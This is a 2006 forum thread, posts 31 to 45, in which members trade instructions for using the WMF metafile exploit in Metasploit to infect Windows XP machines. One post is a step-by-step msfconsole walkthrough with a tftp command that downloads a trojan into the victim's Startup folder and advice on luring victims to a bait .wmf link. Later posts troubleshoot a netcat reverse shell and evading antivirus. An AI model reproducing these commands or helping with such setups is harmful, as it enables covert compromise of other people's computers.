Forums: Wmf Exploit With Download & Exec Shellcode - Forums


Wmf Exploit With Download & Exec Shellcode

#31 mrgoolie
  • Private
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 04 January 2006 - 11:44 AM

That would indeed be nice! :P

#32 txR
  • Private
  • Group: Members
  • Posts: 1
  • Joined: 04-January 06

Posted 04 January 2006 - 01:55 PM

Okay guys, I discovered the exploit 3 hours ago (I read on a news site that there is a new exploit for WinXP) and now I bring the solution lol! I downloaded Metasploit Framework & ie_xp_pfv_metafile.pm (this file must go in the Metasploit Framework\home\framework\exploits\ie_xp_pfv_metafile.pm directory)

Now look what you must do:


[msfconsole ASCII-art banner]


+ -- --=[ msfconsole v2.5 [112 exploits - 74 payloads]


msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > show TARGETS

Supported Exploit Targets
=========================

0 Automatic - Windows XP / Windows 2003

msf ie_xp_pfv_metafile > set TARGET 0
TARGET -> 0
msf ie_xp_pfv_metafile > show payloads

Metasploit Framework Usable Payloads
====================================

win32_exec                   Windows Execute Command
win32_passivex               Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter   Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg           Windows Staged PassiveX Shell
win32_passivex_vncinject     Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse                Windows Reverse Shell
win32_reverse_dllinject      Windows Reverse DLL Inject
win32_reverse_meterpreter    Windows Reverse Meterpreter DLL Inject
win32_reverse_stg            Windows Staged Reverse Shell
win32_reverse_stg_upexec     Windows Staged Reverse Upload/Execute
win32_reverse_vncinject      Windows Reverse VNC Server Inject

msf ie_xp_pfv_metafile > set PAYLOAD win32_exec
PAYLOAD -> win32_exec
msf ie_xp_pfv_metafile(win32_exec) > set CMD calc.exe
CMD -> calc.exe
msf ie_xp_pfv_metafile(win32_exec) > check
[*] No check has been implemented for this module
msf ie_xp_pfv_metafile(win32_exec) > exploit
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.111:1051 using Windows XP, sending payload...


You can also use: set CMD "tftp -i x.x.x.x GET c:/server.exe c:/document and settings/all users/start menu/programs/startup/server.exe"

Then just tell the victim to go to this website: http://your.ip.adress:8080/HOTGIRL.wmf and he is infected by your trojan..
Enjoy!

Also, is there anyone here who knows the DOS command to start the telnet server instead of the service console?
And any good FTP trojan name?

cya

txR always brings the best to ya :D

#33 stay
  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 04 January 2006 - 02:55 PM

Nice tut txR, now I know how to use Metasploit, not only this exploit ;)
I also tried win32_reverse, used seh as exit function (if this maybe is important...), and listened with netcat for the shell:
nc -lvp 1234
However, when I click the link I only get

Quote

connect to [192.168.1.99]from pcname [192.168.1.99] 1897
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

What do I have to do so that the shell isn't instantly closed?

#34 mrgoolie
  • Private
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 04 January 2006 - 04:20 PM

Does somebody know where my error is in this tftp command?

tftp -i users.xxx.com/directory/ GET server.exe c:/documents and settings/all users/start menu/programma's/opstarten/server.exe

Update: I think my problem is with the directory stuff I added to my server...

#35 VUGO
  • Private
  • Group: Members
  • Posts: 16
  • Joined: 15-December 05

Posted 04 January 2006 - 06:55 PM

Well,
has somebody here had success in adding a Download/Execute shellcode inside the .WMF file?
We need details about this method.
Thanks to all.
Regards...

Igor Marcel - Vugo Verbal Killer (VUGO) - vugo"at"hotmail.com
Information Security Consultant
"Linux is modism, BSD is a life style!"

#36 mrgoolie
  • Private
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 05 January 2006 - 03:34 AM

I'm trying to make it work via a router, but can't find a way :angry:
I opened port 8080 in my router and forwarded it to my internal IP,
but it doesn't seem to work...
Anybody?

#37 stay
  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 05 January 2006 - 04:59 AM

I only opened port 8080 in my router config and used the win32_exec payload (CMD calc.exe) - works fine!
But can somebody help me with my reverse shell problem? (see my post before)

#38 mrgoolie
  • Private
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 05 January 2006 - 05:10 AM

stay, on Jan 5 2006, 01:59 PM, said:

I only opened port 8080 in my router config and used the win32_exec payload (CMD calc.exe) - works fine!
But can somebody help me with my reverse shell problem? (see my post before)


So you opened port 8080 in your router and forwarded it to your internal IP?
And what did you use for localhost? Strange things...
Look at this picture... Anybody know what I did wrong?

http://users.skynet.be/fb059704/checkthis.JPG

#39 stay
  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 05 January 2006 - 05:22 AM

The LAN IP, there's no other possibility (ok, in my case I used the MAC address, my router has no option for redirecting to IPs) - internal and external port 8080.

@mrgoolie [after editing image in post]
1) Router config is right

For all others:
2) I think txR and I used http://www.frsirt.co...metafile.pm.php and not the built-in one of Metasploit
3) We used the built-in win32_exec payload function of Metasploit (see txR's tutorial)

#40 mrgoolie
  • Private
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 05 January 2006 - 05:45 AM

It's indeed another one; I think you can see the difference because with the built-in exploit in Metasploit, you get
listening at http://xxx.xxx.xxx.xxx/
and with the one STAY uses, you see http://xxx.xxx.xxx.xxx/anything.wmf

#41 mrgoolie
  • Private
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 05 January 2006 - 06:06 AM

I f*cking hate my Belkin router... can't find a solution after looking for one for 2 hours now.
I just opened port 8080 in my Belkin router to my internal port 8080 and internal IP 192.168.2.9.
When somebody makes a connection to http://217.xxx.xxx.xxx/anything.wmf there's an error saying
"can't connect to xxx.xxx.xxx.xxx"
and I won't give it up!
Any hints or tips would be helpful.

#42 stay
  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 05 January 2006 - 06:22 AM

You forgot the port :P
http://[ip]:[port]/anything.wmf

#43 mrgoolie
  • Private
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 05 January 2006 - 06:26 AM

Yeah, I forgot it here, but not when I tested it! I tested it with http://217.xxx.xxx.x...80/anything.wmf and it doesn't work either :angry:
I'm gonna blow up my PC I think :)

#44 stay
  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 05 January 2006 - 06:46 AM

Better blow up your router; before my current one I had one which also ignored every forwarded port so far ;)
Btw try http://127.0.0.1:8080/test.wmf using MSIE

#45 mrgoolie
  • Private
  • Group: Members
  • Posts: 18
  • Joined: 30-December 05

Posted 05 January 2006 - 06:47 AM

Alright, I tried with port 1234 as incoming port and then my internal port 8080
and it works, so I think maybe my provider blocks port 8080, I don't know.
So when a friend of mine goes to http://xxx.xxx.xxx.xxx:1234/test.wmf
it works, but his Norton finds it :( and when he disables his Norton, calc.exe doesn't start up.